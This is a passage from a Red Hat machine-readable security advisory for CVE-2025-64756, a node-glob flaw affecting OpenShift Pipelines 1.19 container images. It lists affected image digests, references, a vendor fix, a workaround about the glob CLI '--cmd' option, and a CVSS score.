"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-64756"
},
{
"category": "external",
"summary": "RHBZ#2415451",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2415451"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-64756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64756"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64756"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146",
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2",
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
}
],
"release_date": "2025-11-17T17:29:08.029000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "workaround",
"details": "To mitigate this issue, avoid using the `glob` command-line interface with the `-c` or `--cmd` option when processing filenames from untrusted sources. If programmatic use of `glob` is necessary, ensure that filenames are thoroughly sanitized before being passed to commands executed with shell interpretation enabled.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
